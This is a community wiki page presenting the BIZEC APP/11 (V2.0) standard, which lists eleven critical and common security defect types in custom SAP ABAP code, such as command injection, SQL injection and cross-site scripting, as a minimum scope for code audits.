From - The Business Security Community
Jump to: navigation, search

BIZEC APP/11 (V2.0)

The BIZEC APP/11 standard comprises the most critical and the most common security defects in SAP ABAP applications. Its purpose is to give companies that plan to conduct ABAP code audits guidance which types of security defects should be covered at minimum by an audit.

This updated list (V2.0) was created based on (static) code analysis of more than 100 Million lines of custom ABAP code from 50 different companies, conducted by BIZEC members. The absolute frequency of (dangerous) findings has been used as a basis for the new APP/11 standard.

The BIZEC APP/11 standard is composed of two sections: A "Critical" section at the top and a "Common" section below.

The "Critical" section lists types of security defects where a single vulnerability would result in complete compromise of the SAP server. These types of defects must be in the test scope of every ABAP code audit.

The "Common" section lists dangerous types of security defects that are most commonly observed in custom ABAP code in the order of their absolute frequency in the analyzed code base.

Experts that contributed to the BIZEC APP/11 (V2.0) standard (alphabetical order):

  • Roswitha MacLean, Security Expert Application Security, Daimler
  • Reinhard Schneider, Application Development and Maintenance Team Lead, Knauf Information Services
  • Markus Seibel, SAP Security Lead, General Motors
  • Juergen Wachter, SAP Senior Consultant, comgroup
  • Andreas Wiegenstein, CTO, Virtual Forge

Please note that all listed types of defects are a high threat to the security of every SAP business scenario.

If you have questions regarding the BIZEC APP/11 standard (V2.0), please contact BIZEC.

BIZEC APP/11 Version 2.0 - October 2012

APP-01 ABAP Command Injection Critical
Coding that dynamically creates and executes ABAP programs based on user input on a productive system, bypassing SE80 and the concept of a three-tier-system landscape.
Violates: PG-1, PG-2, PG-3, PG-4, PG-5, PG-6, PG-7
APP-02 OS Command Injection Critical
Coding that executes arbitrary (input-based) commands on the operating system, bypassing the allowed commands specified in transaction SM49/SM69 and S_LOG_COM authorizations.
Violates: PG-6, PG-7
APP-03 Native SQL Injection Critical
Coding that executes arbitrary (input-based) native SQL commands on the SAP database, bypassing any Open SQL restriction.
Violates: PG-1, PG-2, PG-4, PG-6, PG-7
APP-04 Improper Authorization (Missing, Broken, Proprietary, Generic) Common
Coding that does not (properly) perform authorization checks based on the SAP standard for critical operations. Improper Authorization includes semantically incorrect authority checks, generic authority checks, missing authority checks as well as proprietary authorization checks.
Violates: PG-3 (implicitly PG-1, PG-2)
APP-05 Directory Traversal Common
Coding that performs server-side file/directory read/write access, where a file name or path is (partially) based on unvalidated user input. Such coding gives attackers read/write access to restricted files, e.g. OS configuration, SAP configuration and temporarily stored business data.
Violates: PG-1, PG-6, PG-7
APP-06 Direct Database Modifications Common
Coding that directly modifies (restricted) database tables (of the SAP standard) without proper authorizations, bypassing S_TABU_DIS, S_TABU_NAM and S_TABU_CLI authorizations.�
Violates: PG-2
APP-07 Cross-Client Database Access Common
Coding that accesses business data on a different client, bypassing the SAP client separation mechanism.
Violates: PG-5 (implicitly PG-1, PG-2, PG-3, PG-4)
APP-08 Open SQL Injection Common
Coding that makes use of dynamic Open SQL, where part of such a query is based on input. This defect enables malicious users to alter the SQL query in order to access restricted data without authorization.
Violates: PG-5 (implicitly PG-1, PG-2, PG-3, PG-4)
APP-09 Generic Module Execution Common
Coding that allows uncontrolled execution of SAP standard business modules. The SAP standard provides a large number of business modules in the basis as well as the business suite. Execution of these business modules is restricted by SAP standard security features, e.g. SE37, SE38/SA38 and SE80.
Violates: PG-3 (implicitly PG-1, PG-2)
APP-10 Cross-Site Scripting Common
(BSP) Coding that does not properly encode data before rendering it as HTML. Cross-Site Scripting (XSS) attacks are targeted at users that run business applications in Web browsers. An XSS vulnerability compromises the security of the attacked user's client system, affecting any active SAP sessions.
Violates: PG-1, PG-2, PG-3, PG-4, PG-5, PG-6, PG-7
APP-11 Obscure ABAP Code Common
Any coding that uses stealth techniques in order to obscure its true purpose.
Violates: PG-4
Personal tools